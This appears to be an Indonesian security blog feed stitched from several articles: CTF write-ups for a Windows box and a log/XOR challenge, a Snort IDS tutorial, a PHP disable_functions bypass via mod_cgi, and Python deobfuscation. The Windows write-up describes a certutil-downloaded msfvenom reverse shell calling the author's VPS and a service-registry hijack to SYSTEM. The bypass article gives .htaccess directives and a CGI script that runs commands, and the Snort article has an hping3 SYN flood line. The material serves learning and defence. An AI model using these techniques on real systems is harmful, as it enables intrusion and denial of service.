Pentest Day Bhitech Challenge

Host: 143.198.222.180
Machine: Windows
Level: Easy
Flag Format: bhitech{}

Deskripsi: Selamat datang di Pentest Day! Tantangan simpel, tapi seru. Tugasmu adalah mendapatkan dua flag yang tersembunyi di direktori user dan administrator. Gunakan segala cara dan skill yang kamu punya—dari eksploitasi sampai trik-trik cerdik lainnya!

Ingat, tujuan utamanya adalah eksplorasi dan belajar. Jangan merusak system yang ada! Semua yang kamu lakukan harus untuk tujuan edukasi.

Catatan: Jangan lupa fokus untuk eksploitasi dan seru-seruan—gak ada yang lebih keren dari belajar sambil nge-hack!

Good luck, happy hacking, and let’s grab those flags!

Dimana sama dengan chall pentesting lainnya yang mengharuskan untuk membaca flag yang disimpan pada server yakni terletak pada user dan administrator directory, dan disini kita diberikan suatu IP address server jadi langsung lakukan reconnaissance untuk phase awal

Terdapat beberapa service yang open diantarannya ada HTTP dan SMB yang bisa kita jadikan untuk foothold atau pijakan awal sebelum melakukan exploitation, dan jika dibuka pada service HTTP terlihat terdapat default halaman setelah installation Umbraco CMS dan juga terdapat form login untuk authentikasi

Disini kita tidak mempunyai valid credential untuk login, selanjutnya kita coba cek service berikutnya yaitu SMB server

Ternyata terdapat vulnerability SMB null session artinya SMB tersebut mengizinkan authentikasi tanpa credential jadi kita bisa akses sharename tanpa memasukkan username/password, dan jika diperhatikan ada sharename yang tidak biasa yaitu DataManager

Setelah diakses ditemukannya file XLS dengan nama member_account.xlsx, kemudian kita akan buka pada document viewer

Dokumen XLS tersebut berisikan informasi sensitive dari member Bhineka Tech yang juga menampilkan user, passsword beserta keahlian yang dimiliki beberapa member tetapi uniknya user dengan ID 3 berbeda dari yang lain yakni user tersebut menggunakan email dan jika kita lihat lagi pada login Umbraco diatas terdapat placeholder pada input username yaitu “Your username is usually your email” yang mengindikasikan jika username berupa email address, langsung saja kita coba login

Berhasil masuk dashboard Administrator, dan langkah selanjutnya kita cek version dari CMS umbraco yang digunakan

Versi yang digunakan yaitu 7.12.4 dan jika kita melihat pada exploit database menggunakan searchsploit

Ada vulnerability pada Umbraco versi 7.12.4 yaitu Remote Code Execution / RCE dengan kategori Authenticated yang berarti harus mempunyai privilege minimal untuk masuk dashboard, karena sudah didapatkan sebelumnya sekarang kita mulai untuk tahapan exploitation

Terlihat berhasil melakukan code execution artinya exploit berhasil dan jika di inputkan beberapa command batch script dasar akan menampilkan output yang sesuai.

Karena tidak mungkin untuk melakukan command satu persatu dan bolak balik exploit jadi disini kita akan generate binary executable untuk reverse shell menggunakan msfvenom

Karena casenya disini public server jadi kita melakukan generate binary reverse shell dengan listener yang di set ke IP VPS atau jika tidak mempunyai VPS bisa juga melakukan tunneling atau port forwarding menggunakan ngrok dan semacamnya

sebelumnya aku sudah aktifkan python http server di port 8000 pada VPS jadi disini kita tinggal download binary di server target menggunakan certutil yang akan disimpan didalam temporary directory dalam case windows ada di C:/windows/temp, kemudian kita execute binary jadi tinggal dipanggil full pathnya otomatis akan ter-eksekusi

Reverse shell berhasil dengan listener di port 9999, selanjutnya kita baca user flag pada directory users dan dalam hal ini ternyata user yang ada diserver menggunakan username rama

User flag : “bhitech{KuL0_T14nG_J4W1}”

Privilege Escalation

Selanjutnya kita diminta untuk membaca flag pada Administrator directory yang tentu saja akan access denied karena privilege user yang kita dapatkan merupakan Service Account yang tidak memiliki akses pada directory Administrator, jadi disini kita akan melakukan privilege escalation atau meningkatkan hak akses.

Sebenarnya ada banyak cara yang digunakan untuk enumeration pada tahapan post-exploitation pada windows sendiri, tapi disini kita akan automation saja menggunakan winpeas

https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md

Jadi winpeas sendiri berfungsi untuk identifikasi service, component, kernel, scheduled task, registry dan lain lain jika terdapat suatu vulnerability ataupun misconfiguration yang bisa dimanfaatkan untuk melakukan Privilege Escalation

Download winpeas entah dengan menggunakan utility apapun bisa cURL ataupun certutil lalu jalankan

Disini ditemukan suatu service dengan nama BhitechService yang dimana Authenticated Users atau user dalam machine tersebut dapat melakukan full control pada registry yang dimana ini sangat berbahaya karena attacker bisa mengganti binary executable pada registry service tersebut dengan malicious atau executable berbahaya

Seknarionya disini kita akan melakukan generate ulang binary reverse shell menggunakan msfvenom dengan listener port 9000, lalu kita ubah ImagePath dari registry BhitechService dengan binary reverse shell yang kita buat jadi saat service di restart otomatis akan dieksekusi sebagai NT/System

Oke jadi disini menggunakan reg add yaitu command registry bawaan windows untuk replace binary ImagePath registry ke binary reverse shell yang kita buat, disini berhasil karena dari hasil enumeration dari winpeas Authenticated Users mempunyai full control pada registry BhitechService

Sekarang kita coba restart service menggunakan command net start BhitechService dan jangan lupa aktifkan netcat pada port 9000 yang kita buat tadi untuk dijadikan sebagai listener

Untuk message dari output net start bisa dihiraukan yang terpenting kita berhasil mendapatkan shell sebagai NT/System atau privilege tertinggi pada windows machine

Sekarang kita baca flagnya pada directory Administrator

Root flag : bhitech{G0tt_Acc3ss_adm1n_m4TuR_NuWun_s4ng3t}

Challenge solved rek, dan untuk tambahan sebenarnya masih ada teknik privilege escalation lain yang bisa digunakan karena casenya disini kita mendapatkan akses ke service account dan mempunyai 2 privilege penting yaitu SeAssignPrimaryTokenPrivilege dan SeImpersonatePrivilege yang bisa dimanfaatkan untuk melakukan token impersonation dan mendapatkan akses ke NT/System karena terlalu panjang mungkin akan dibahas lain kali jadi itu saja semoga bermanfaat.

Artikel Windows Pentesting Bhitech – Write Up pertama kali tampil pada Bhineka blog.

pada blog kali ini aku akan membahas snort. Snort adalah sistem deteksi intrusi jaringan Open Source yang diciptakan oleh pendiri Sourcefire dan mantan CTO Martin Roesch. Cisco kini mengembangkan dan mengelola Snort. Sumber: https://en.wikipedia.org/wiki/Snort_(software)

Apa itu Snort?

Snort disebut sebagai packet sniffer yang memantau lalu lintas jaringan, memeriksa setiap paket secara saksama untuk mendeteksi muatan berbahaya atau anomali yang mencurigakan. Sudah lama menjadi yang terdepan di antara alat pencegah dan deteksi intrusi perusahaan, pengguna dapat mengompilasi Snort di sebagian besar sistem operasi (OS) Linux atau Unix. Versi Snort juga tersedia untuk Windows. tapi pada blog ini aku akan membahas snort pada linux saja.

Bagaiamana cara kerja snort?

Snort didasarkan pada library packet capture (libpcap). Libpcap adalah alat yang banyak digunakan dalam tcp/IP address traffic sniffer, content search and analyzer untuk pencatatan paket, analisis lalu lintas waktu nyata, analisis protokol, dan pencocokan konten.

Pengguna dapat mengonfigurasi Snort sebagai sniffer, pencatat paket — seperti TCPdump atau Wireshark– atau metode pencegahan intrusi jaringan.

ok baik itu saja teori nya, langsung saja praktek. silahkan sediakan komputer, server virtual (bisa public atau lokal) dan internet yang cepat.

Install SNORT dan konfigurasi

pertama-tama install snort.

apt install snort -y

maka akan terinstall snort versi 2.9.x.x. kemudian setelah itu buka file bernama /etc/snort/snort.debian.conf kemudian isi variabel DEBIAN_SNORT_OPTIONS dengan value -A full. Maka jadinya seperti ini:

untuk menjalankan snort bisa dua mode, yaitu mode console dan mode background running.

untuk background running bisa menggunakan perintah berikut:

snort -c /etc/snort/snort.conf -l /var/log/snort/ -K ascii -D

untuk running sebagai console

snort -A console -c /etc/snort/snort.conf -i eth0 -v

Keterangan perintah

pada blog ini aku jalan snort mode background.

Dasar Menulis Rules

Snort mendeteksi berdasarkan rule atau aturan yang di buat. Didalam snort sudah banyak rule yang bisa digunakan (file rule ada pada /etc/snort/rule) tetapi kali ini aku membuat rule atau aturan sendiri. Pertama-tama format rule, format rul seperti ini:

action protocol address port direction address port (rule option)

Format rule Snort terdiri dari beberapa bagian, yaitu action, protocol, address, port, direction, address, port, dan rule options. Berikut penjelasan rinci untuk masing-masing bagian:

1. Action

Menentukan tindakan yang dilakukan Snort ketika mendeteksi kecocokan dengan aturan. Contoh tindakan:

• alert: Menghasilkan alert atau notifikasi.
• log: Merekam paket ke dalam file log.
• pass: Mengabaikan paket.
• drop: Menjatuhkan paket (hanya pada mode inline).
• reject: Menolak koneksi dan memberi tahu pengirim.
• sdrop: Menjatuhkan paket tanpa mencatatnya

2. Protocol

Menentukan protokol jaringan yang diperiksa. Contoh protokol:

• tcp: Untuk lalu lintas TCP.
• udp: Untuk lalu lintas UDP.
• icmp: Untuk pesan ICMP.
• ip: Untuk semua lalu lintas IP.

3. Address (Sumber dan Tujuan)

Menentukan alamat sumber dan tujuan paket. Format:

• Alamat IP spesifik: 192.168.1.1
• Subnet: 192.168.1.0/24
• Semua alamat: any
• Negasi: !192.168.1.0/24 (alamat yang tidak termasuk subnet ini).

4. Port (Sumber dan Tujuan)

Menentukan port sumber atau tujuan. Format:

• Port spesifik: 80
• Rentang port: 8000:9000
• Semua port: any
• Negasi: !80

5. Direction

Menentukan arah lalu lintas yang diperiksa:

• ->: Dari alamat sumber ke tujuan.
• <-: Dari alamat tujuan ke sumber.
• <>: Dua arah (bidirectional).

6. Rule Options

Dibungkus dalam tanda kurung () dan berisi kriteria tambahan serta tindakan saat aturan cocok. Beberapa elemen dalam rule options:

• msg: Pesan yang ditampilkan saat aturan cocok.
  Contoh: msg:"Possible SQL Injection";
• sid: ID unik aturan.
  Contoh: sid:1000001;
• rev: Revisi aturan.
  Contoh: rev:1;
• content: String konten yang dicari dalam paket.
  Contoh: content:"SELECT";
• threshold: Mengontrol frekuensi notifikasi.
  Contoh: threshold:type limit, track by_dst, count 1, seconds 60;

Contoh aturan snort untuk mendeteksi permintaan GET dan POST:

Penjelasan aturan GET

Penjelasan aturan POST

Deteksi Serangan DDOS

buka file /etc/snort/rules/local.rules untuk membuat rule sendiri atau kustom:

alert tcp any any -> $HOME_NET 80 (flags: S; msg:"Serangan DDOS"; detection_filter: track by_dst, count 10000, seconds 60; sid:1000002;)

Penjelasan rule:

setelah rule di tulis, jalan service snort dengan perintah systemctl start snort kemudian jalankan snort di latar belakang snort -c /etc/snort/snort.conf -l /var/log/snort/ -K ascii -D. Setelah itu log kita bisa watch file alert nya di /var/log/snort/alert. Jika ingin melihat secara real-time gunakan perintah beritkut watch -n 1 tail /var/log/snort/alert.

Uji Coba Serangan Deteksi DDOS

gunakan hping:

hping3 -S -p 80 -d 120 --flood <IP target>

Penjelasan perintah:

setelah perintah hping di jalankan, maka pada monitor file alert, akan seperti ini:

dari file alert ini, bisa di integrasikan dengan bot telegram untuk notifikasi serangan ke admin. seperti ini contohnya:

Sekian terima kasih sudah membaca sampai akhir, semoga ilmu nya bermanfaat untuk keperluan mu

Artikel Implementasi Snort Pada Real Publik Server pertama kali tampil pada Bhineka blog.

Pada banyak server, command syscall yang digunakan untuk melakukan eksekusi bash dan shell script di non-aktifkan untuk keperluan keamanan disini bertujuan agar attacker tidak dapat melakukan compromised lebih jauh pada target seperti melakukan privilege escalation, pivoting, persistence maupun post exploitation.

Jadi disini aku akan membahas salah satu teknik yang digunakan untuk melakukan bypass disable function yang memanfaatkan module cgi pada webserver apache dan yang perlu digaris bawahi untuk melakukan bypass menggunakan teknik ini harus ada requirement atau kondisi agar berhasil yaitu mod_cgi perlu diaktifkan dan kedua direktif AllowOverride pada konfigurasi apache harus aktif yang bertujuan agar kita bisa melakukan overwrite konfigurasi menggunakan .htaccess file.

Pertama setup lab pada vps atau di local untuk pengujian dan testing, selanjutnya jelas kita perlu install webserver apache dan lakukan setting disable function, karena case kali ini kita menggunakan php 8.3 jadi untuk php.ini kita perlu setting pada directory /etc/php/8.3/apache2/php.ini

kemudian kita perlu install cgi module pada apache lalu aktifkan menggunakan command a2enmod

selanjutnya jangan lupa kita set direktif AllowOverride ke All hal ini bertujuan agar file .htaccess bisa ter-eksekusi

Setelah itu restart apache lalu kita perlu melihat dan verifikasi jika module cgi / mod_cgi dan disable function berhasil di konfigurasi, caranya sederhana cukup buat file php dan tambahkan syntax berikut:

<?php
echo "disable function: " . ini_get("disable_functions");
echo "<br><br>";
echo "apache module: <br>";
foreach(apache_get_modules() as $modules){
    echo $modules . "<br>";
}

?>

Dan jika kita buka via browser

Disini menunjukkan kita berhasil melakukan konfigurasi yang dimana kita tidak akan bisa melakukan eksekusi fungsi syscall karena semua fungsi syscall berbahaya kita lakukan disable dan kita akan manfaatkan mod_cgi ini untuk melakukan bypass disable function.

Sekilas tentang mod_cgi, jadi mod_cgi itu merupakan module cgi pada webserver apache yang memungkinkan webserver untuk melakukan handle dan eksekusi suatu CGI script yang dimana CGI sendiri merupakan protocol yang menyediakan cara untuk melakukan eksekusi script melalui request http contoh sederhananya kita bisa melakukan eksekusi pada file perl(.pl), python(.py) maupun bash(.sh) langsung dari web request atau browser.

Langkah awal kita perlu membuat directory baru dan menambahkan htaccess agar suatu extension dikenali dengan CGI script, simple-nya kita akan membuat bash script agar bisa langsung melakukan eksekusi command. Disini kita hanya perlu membuat htaccess dengan 2 direktif

Options +ExecCGI
AddHandler cgi-script .bhitech

Direktif pertama yaitu Options +ExecCGI yang memberitahu webserver untuk mengizinkan eksekusi CGI script lalu direcktif kedua webserver akan melakukan eksekusi jika ditemukan extension .bhitech dan untuk extension opsional kita bisa menambahkan apapun misalkan .cgi, .test, .hijack, .bypass dan lain lain ya

Langkah kedua kita perlu membuat bash script dengan extension .bhitech sederhana saja kita perlu shebang, content type dan command apa yang akan dijalankan

#!/bin/bash
echo -ne "Content-type: text/html\n\n"
id

Disini kita akan menjalankan command id untuk melihat id dan user kita sekarang jadi pada directory akan menjadi 2 file yaitu htaccess dan cgi script seperti ini

Lalu jika kita open via browser pada file script.bhitech

Terlihat command id tereksekusi yang berarti kita berhasil melakukan bypass disable function dan untuk command lain mudah saja kita ganti pada file script.bhitech misalkan uname -a

Yang akan menampilkan informasi tentang kernel pada server. mungkin akan ribet jika harus modifikasi file untuk melakukan eksekusi command lain jadi disini aku membuat tools untuk melakukan automasi agar lebih mudah dan dinamis

https://github.com/ibrahimzx/mod-cgi-disable-function

Untuk menggunakan cukup mudah dengan hanya menambahkan GET parameter ?cmd pada url

Disini misalkan ingin membaca /etc/passwd tinggal tambahkan parameter ?cmd=cat /etc/passwd dan command akan dieksekusi serta ditampilkan pada browser

Penutup

Teknik diatas merupakan salah satu dari sekian banyak cara untuk melakukan bypass pada disable function, disini agar pembaca lebih aware dengan tidak hanya mengandalkan disable function dan menganggap itu aman bahkan jika mod_cgi tidak diaktifkan attacker bisa memanfaatkan fungsi mail dengan LD_PRELOAD atau pada webserver nginx bisa dengan memanfaatkan php-fpm dan protocol gopher untuk mencapai eksekusi command. Ada juga teknik yang melakukan exploiation pada php itu sendiri dengan memanfaakan beberapa bug PHP yang sudah di publish pada https://bugs.php.net/ seperti melakukan poisoning process dan menulis data berbahaya pada memory. Oke mungkin cukup sekian artikel kali ini dan semoga bermanfaat.

“Tidak ada akhir untuk pendidikan. Bukan berarti Anda membaca buku, lulus ujian, dan menyelesaikan pendidikan. Seluruh kehidupan, dari saat Anda lahir hingga saat Anda mati, adalah proses pembelajaran.” – Jiddu Krishnamurti

Artikel Bypass disable function using mod_cgi pertama kali tampil pada Bhineka blog.

Karena mudah dipelajari dan hampir compatible di semua platform, python banyak digunakan mulai dari programmer hingga pentester dan pada topik kali ini kita akan membahas bagaimana melakukan reverse engineering pada python karena biasanya programmer melakukan semacam teknik packing pada source code seperti melakukan obfuscate, compile serta converting kedalam bytecode.

Hal yang perlu diketahui disini beberapa program python pada banyak kasus tidak bisa dikembalikan kedalam source code aslinya jika programmer melakukan compile dan serialization menjadi bytecode seperti menggunakan marshal, pyarmor ataupun menjadikannya suatu executable file tapi jika programmer hanya melakukan obfuscate pada code menggunakan fungsi semacam eval, lambda, zlib, exec besar kemungkinan kita masih bisa mendapatkan source code asli pada program.

Kita bisa contohkan dengan program sederhana

import codecs

def validation(input):
        valid_input = codecs.decode("ouvarxn-grpu1336", "rot-13")
        if input == valid_input:
                return True


        return False


print("Enter valid input: ", end="")
input_user = input()

if validation(input_user):
        print("Input correct!!")
else:
        print("Input incorrect no have access!!")

Scriptnya sangat sederhana dimana terdapat satu function untuk melakukan validasi input dengan string yang sudah dilakukan substitusi menggunakan ROT-13 lalu setelah di obfuscate menjadi seperti ini :

_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'A+pAW8w/+9cxY35EeyFVcLbyqDKGpUOanCFCUVVwGWItIYh9LzSSfRhole9RY8NVAqm0Bah4cir/PYFOiiCVIi1GYChx1LLEryJr+r3w0YzDOW0X8wGWYV90lCZwxIi5r4DAhED74pv6ZfYp7jf3tX4rqiVTMgCpUKa7CWGdZ0xV2dom1pnQNOz+Uk9uDlDPVEkizxnF4pDe1NnS9rWKmbls9A3Ho+wyR66EjIz3Qm4sckZDEMgKEIjogXq07OlXac8e8DY9HHOVzSQ5tXx5M8GZxa3nAx41zRazZRm2UPgh7ZpwocDx6/uQ05I03N63GPjsmpXjCZ/kHtbPvtGe1jWfqZf+tNkqC3e9Yy8OYJIh85XaZnesf7xZmjskHUtcJNkebJ5XA08w2Ptm/hHMbot288OWyQrTNR2ZOOXC+sSIa1wRL7YdNFAWUSd97hoc5Z7Am26D9Lm+wN4moDKJOXM639h0v39+3y2iBd3s6nvx1ZMJ7apc0LVYh6OSxTBG6VbOPDNAAAkQ2udwFwJe'))

Dan jika kita run keduanya sama sama menampilkan output yang sama dan program juga berjalan dengan benar hanya saja pada code obfuscate kita tidak mengerti fungsi apa dan seperti apa source code didalamnya karena sudah dilakukan encoding dengan zlib dan base64.

Jadi mudah saja untuk melakukan deobfuscate kita tinggal me-replace fungsi exec() dengan print() karena kita tau jika fungsi exec() digunakan untuk melakukan eksekusi source code sedangkan fungsi print() digunakan untuk menampilkan output ke layar

_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));print((_)(b'A+pAW8w/+9cxY35EeyFVcLbyqDKGpUOanCFCUVVwGWItIYh9LzSSfRhole9RY8NVAqm0Bah4cir/PYFOiiCVIi1GYChx1LLEryJr+r3w0YzDOW0X8wGWYV90lCZwxIi5r4DAhED74pv6ZfYp7jf3tX4rqiVTMgCpUKa7CWGdZ0xV2dom1pnQNOz+Uk9uDlDPVEkizxnF4pDe1NnS9rWKmbls9A3Ho+wyR66EjIz3Qm4sckZDEMgKEIjogXq07OlXac8e8DY9HHOVzSQ5tXx5M8GZxa3nAx41zRazZRm2UPgh7ZpwocDx6/uQ05I03N63GPjsmpXjCZ/kHtbPvtGe1jWfqZf+tNkqC3e9Yy8OYJIh85XaZnesf7xZmjskHUtcJNkebJ5XA08w2Ptm/hHMbot288OWyQrTNR2ZOOXC+sSIa1wRL7YdNFAWUSd97hoc5Z7Am26D9Lm+wN4moDKJOXM639h0v39+3y2iBd3s6nvx1ZMJ7apc0LVYh6OSxTBG6VbOPDNAAAkQ2udwFwJe'))

Disini kita ubah exec() dengan print() lalu jika kita jalankan

terlihat menampilkan output tetapi output masih menunjukkan code yang masih ter-obfuscate dan bisa kita asumsikan jika obfuscate pada program menggunakan double encoding dan caranya untuk mendapatkan source code aslinya dengan copy ouput dan kita buat file python baru lalu ubah exec() menjadi print() jalankan dan jika belum menampilkan code asli ulangi hingga menemukan source code aslinya.

Cara cepatnya lebih baik kita membuat script automation decoding agar tidak perlu repot repot melakukan decoding

_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));


obfuscate_str = (_)(b'A+pAW8w/+9cxY35EeyFVcLbyqDKGpUOanCFCUVVwGWItIYh9LzSSfRhole9RY8NVAqm0Bah4cir/PYFOiiCVIi1GYChx1LLEryJr+r3w0YzDOW0X8wGWYV90lCZwxIi5r4DAhED74pv6ZfYp7jf3tX4rqiVTMgCpUKa7CWGdZ0xV2dom1pnQNOz+Uk9uDlDPVEkizxnF4pDe1NnS9rWKmbls9A3Ho+wyR66EjIz3Qm4sckZDEMgKEIjogXq07OlXac8e8DY9HHOVzSQ5tXx5M8GZxa3nAx41zRazZRm2UPgh7ZpwocDx6/uQ05I03N63GPjsmpXjCZ/kHtbPvtGe1jWfqZf+tNkqC3e9Yy8OYJIh85XaZnesf7xZmjskHUtcJNkebJ5XA08w2Ptm/hHMbot288OWyQrTNR2ZOOXC+sSIa1wRL7YdNFAWUSd97hoc5Z7Am26D9Lm+wN4moDKJOXM639h0v39+3y2iBd3s6nvx1ZMJ7apc0LVYh6OSxTBG6VbOPDNAAAkQ2udwFwJe')


decode = str(obfuscate_str).replace('b"exec', "").replace('"', '')

result = b""
for i in range(0, 4):
        x = eval(decode)
        decode = str(x).replace('b"exec', "").replace('"', '')
        result = x


print(result.decode('utf-8'))

Jadi fungsi pada script diatas yaitu akan melakukan iterasi sebanyak 5 kali serta melakukan replace fungsi exec lalu dilakukan eval untuk menyimpan hasil decoding pada variable x hingga menemukan source code asli dan terakhir menggunakan print untuk menampilkan output code pada layar

Jika dijalankan maka akan manampilkan source code hasil deobfuscate yang menunjukkan kita berhasil mendapatkan source code aslinya. Case disini source code bisa dikembalikan pada bentuk semula karena hanya obfuscate memakai double encoding tapi bagaimana jika programmer melakukan compiling ataupun serialization ? jawabannya dengan melakukan analysis bytecode

Kita perlu kenalan dulu dengan marshal, jadi marshal merupakan fungsi atau modul bawaan dari python yang digunakan untuk mendapatkan byte code dari suatu script python itu sendiri jadi bisa kita sebut marshal ini sebagai suatu pseudo compiled dimana dengan marshal kita bisa melakukan converting code python ke binary format dan serialization menjadi bytecode object.

kita bisa melakukan compile python script menggunakan command :

python3 -m py_compile source_codes.py

dan outputnya nanti akan tersimpan pada directory __pycache__ yang dimana extension file berubah menjadi .pyc. Sebenarnya.pyc merupakan file marshal yang ditambahkan header dan jika beruntung kita bisa melakukan decompile menggunakan uncompyle6 untuk mendapatkan source code asli tapi tidak selalu berhasil jadi cara alternatifnya kita perlu membaca bytecode mengunakan modul python yaitu dis.

untuk mengambil bytecode script python pada pyc mudah saja kita perlu mengambil byte setelah header dan paddingnya yaitu 16 byte lalu kita simpan pada file terpisah dan lakukan load menggunakan marshal.loads()

Kita bisa ambil row kedua setelah 16 byte pada offset 00000010

import marshal

f = open("__pycache__/source_code.cpython-311.pyc", "rb").read()[16:]
#f = open("source_code.py", "r").read()

print(f)
#code = compile(f, '', 'exec')
#print(marshal.dumps(code))

dan jika kita jalankan

maka akan menampilkan semua bytecode marshal pada file pyc kemudian kita bisa copas semua output lalu buat file baru yang nantinya kita akan eksekusi menggunakan marshal.loads()

jika kita eksekusi sama saja dengan program .pyc kita

Disini bytecode dari pyc berguna untuk melakukan disassemble menggunakan modul dis yang kita bahas sebelumnya

kita hanya perlu import modul dis dan lakukan pemanggilan fungsi dis.dis dengan parameter hasil marshal.loads() yang sebelumnya kita dapatkan

Maka akan menampilkan hasil disassemble opcode dari script python hal ini bisa sulit jika codenya rumit tapi dari sini kita bisa melihat fungsi apa saja dan bagaimana suatu program itu bekerja

Disassembly of <code object validation at 0x7fe1e3401330, file "source_code.py", line 3>:
  3           0 RESUME                   0

  4           2 LOAD_GLOBAL              1 (NULL + codecs)
             14 LOAD_ATTR                1 (decode)
             24 LOAD_CONST               1 ('ouvarxn-grpu1336')
             26 LOAD_CONST               2 ('rot-13')
             28 PRECALL                  2
             32 CALL                     2
             42 STORE_FAST               1 (valid_input)

  5          44 LOAD_FAST                0 (input)
             46 LOAD_FAST                1 (valid_input)
             48 COMPARE_OP               2 (==)
             54 POP_JUMP_FORWARD_IF_FALSE     2 (to 60)

  6          56 LOAD_CONST               3 (True)
             58 RETURN_VALUE

  9     >>   60 LOAD_CONST               4 (False)
             62 RETURN_VALUE

Contohnya pada fungsi validation dimana ada beberapa mnemonic seperti LOAD_GLOBAL yang digunakan untuk mengambil fungsi global dalam hal ini codecs lalu ada LOAD_ATTR yang mengambil attribute dengan 2 parameter yaitu ouvarxn-grpu1336 dan rot-13 yang di inisialisasi menggunakan LOAD_CONST dan dilakukan perbandingan menggunakan COMPARE_OP dari variable input(dalam hal ini input dari user) dengan valid_input yang mengambil dari LOAD_GLOBAL codecs.

Disini kita bisa analysis jika codecs melakukan decode ROT-13 pada string ouvarxn-grpu1336 dan jika kita decode ROT13 string asli merupakan bhineka-tech1336 lalu kita coba inputkan pada program

dan berhasil yang menunjukkan output Input Correct

Penutup

Sebenarnya masih banyak teknik yang bisa kita lakukan untuk RE pada python contohnya kita juga bisa melakukan overwrite internal module untuk hooking dan menampilkan suatu string / data tertentu atau jika pada executable file kita bisa memanfaatkan teknik memory dump untuk melihat data pada saat program berjalan. Jadi kita tidak mungkin membahas semuanya karena itu akan sangat panjang dan tulisan ini dibuat untuk para reverser engineer agar lebih memahami bagaimana melakukan reverse engineering pada python script jadi mungkin itu saja sekiann.

“Yang penting bukan seberapa pintar kamu, tetapi seberapa keras kamu berusaha.” -Albert Einstein

Artikel Python reverse engineering pertama kali tampil pada Bhineka blog.

LogFrenzy 🕵‍♂💻

Selamat datang di LogFrenzy, tantangan seru untuk menguji kemampuan analisis log dan regex! 🔍 Di sini, peserta akan dihadapkan pada log penuh petunjuk tersembunyi. Tugasnya? Teliti, bongkar pola, pecahkan regex, dan temukan flag yang tersembunyi! 🏆

Kecepatan dan ketelitian adalah kunci, tapi kreativitas dalam memecahkan masalah juga sangat diperlukan. Siap untuk tantangan ini di LogFrenzy? 💥

Level: Medium
Kategori: Web Exploitation & Cryptography
Hadiah (First Solved): Rp 30.000 🏅

URL Challenge: 
https://logfrenzy.siber-tech.web.id
Flag: bhitech{...}

#ChallengeAccepted #LogLife #CTF #Bhitech

Bisa dibaca pada deskripsi untuk lebih jelas dan intinya pada deskripsi diberikan suatu clue yaitu regex dan analysis.

Jika kita masuk pada halaman login terdapat 2 form input yaitu username dan password

Dimana jika view source pada HTML code terdapat regex dari username dan password jadi kita diminta untuk melakukan bypass dan memecahkan validasi regex tersebut.

username regex:
^(?=.*[A-Z])(?=.*[a-z])(?=.*[0-9])(?=.*[!@#$%^&*])[A-Za-z0-9!@#$%^&*]{12,20}$  

password regex: 
^(?=.*[A-Z])(?=.*[a-z])(?=.*[0-9])(?=.*[!@#$%^&*])(?!.*(\d)\1{2,})(?!.*([A-Za-z0-9])\2{2,})[A-Za-z0-9!@#$%^&*]{20,30}$

Jika kita memahami regex sangat mudah untuk memecahkan pattern dari validasi tersebut, pada regex username terdapat pola dimana kita harus menginputkan character mulai dari huruf besar, kecil, angka dan special character hingga 12 sampai 20 dan pada password meminta hingga 20 sampai 30 character.

Mulai analysis manual menggunakan webtools https://regex101.com/ dan lakukan matching pada pattern regex disini kita inputkan dengan Bhitech!@123 dan terlihat matching ya selanjutnya kita analysis pada bagian password

pada password kita juga memiliki pattern yang cocok menggunakan string Bhitech123!A@testing jadi kita sudah menemukan username dan password

user: Bhitech!@123

pass: Bhitech123!A@testing

Jadi kita bisa lanjut untuk login..

Dan kita berhasil masuk dashboard, dan pada tampilan dashboard terdapat 3 list menu dan kita diminta untuk mendownload file log

Pada access log di file pertama tidak ada yang menarik hanya akses log dan menampilkan request path dari client jadi kita lanjut yang kedua

pada file error log kedua juga tidak ada hint atau clue jadi kita skip dan lanjut pada file user action yang ketiga

Dan disini menarik jadi pada file ketiga ini berisi log action user yang sudah login dan terdapat name cookie dari object User Action dimana berisi key session_id dan value semacam unique number.

Kemungkinan ini merupakan suatu valid session dari user sebelumnya karena dari key objectnya menunjukkan cookie jadi kita masukkan cookie dengan name session_id dan memilih acak salah satu value

Benar saja setelah input cookies, pada header website menampilkan suatu pesan yang dimana disana kita menemukan suatu cipher text

Kode rahasia:

3a273b1f001a3034070509163b24610f3a29183c211c550b3c101d0d3a2d692261342649363e2758175836282f

Petunjuk XOR:

Ingat, jika A ^ B = C, maka C ^ A = B! 
Semoga ini membantu!

Format flag: bhitech{...}

Dan kita juga disuguhkan suatu petunjuk terkait dengan XOR. jadi XOR itu merupakan operasi cryptography ya dimana jika 1 ^ 1 = 0 maka 1 ^ 0 =1 atau gampangnya jika bilangan yang di XOR itu sama contoh 1 ^ 1 = 0 atau 0 ^ 0 = 0 dan sebaliknya jika bilangan berbeda maka hasilnya 1

Bisa asumsikan disini kita mempunyai ciphertext tapi tidak mempunyai key jadi rumusnya:

flag ^ key = ciphertext(kita punya)

jika

cipher ^ key = flag(kita belum punya)

disini kita membutuhkan key dimana kita sudah tau sebagian dari format flag yaitu bhitech{} jadi jika 

cipher ^ flag(sebagian) = key 

jadi kita perlu lakukan XOR dengan sebagian flag untuk mendapatkan key sehingga kita bisa melakukan decrypting pada ciphertext 

ada 2 cara ya kita bisa menggunakan webtools maupun membuat suatu program sendiri menggunakan python. Simplenya kita bisa menggunakan webtools dari cyberchef https://gchq.github.io/CyberChef/

Pertama kita convert dulu dari hex karena ciphertext disana di encode menggunakan hexadecimal lalu kedua kita pilih XOR

Terlihat ya saat kita input bhitech(6 character) sebagian output menampilkan XORkey(6 character) karena kita menginput 6 character jadi hasil yang diambil juga 6 character yang dimana kita berhasil mendapatkan suatu key yaitu XORkey dan jika masukkan key yang valid

Maka outputnya akan menampilkan flag yang benar atau bisa juga kita membuat simple program menggunakan python

dan jika kita run

Flag: bhitech{Unlock3d_P@ssw0rd_Of_T1m3_C0nqu3r!ng}

Cukup sekian semoga bermanfaat, keep learning and exploring

Artikel Logfrenzy WriteUp bhitech – challenge pertama kali tampil pada Bhineka blog.

Powershell sendiri dibangun diatas framework .NET dan Jika pada operating system unix-like kita kenal dengan bash script yang yang merupakan command shell berbasis text, tidak seperti shell script lain uniknya pada powershell sendiri menggunakan shell yang berbasis object jadi semua command pada powershell dianggap sebagai suatu object, menarik bukan ?

Oh iya powershell sendiri mulai diperkenalkan pada windows XP yang dimana dulu powershell hanya bisa dipake pada windows environment tetapi sekarang kita bisa juga menginstall powershell pada operating system lain karena microsoft merilis powershell sebagai opensource.

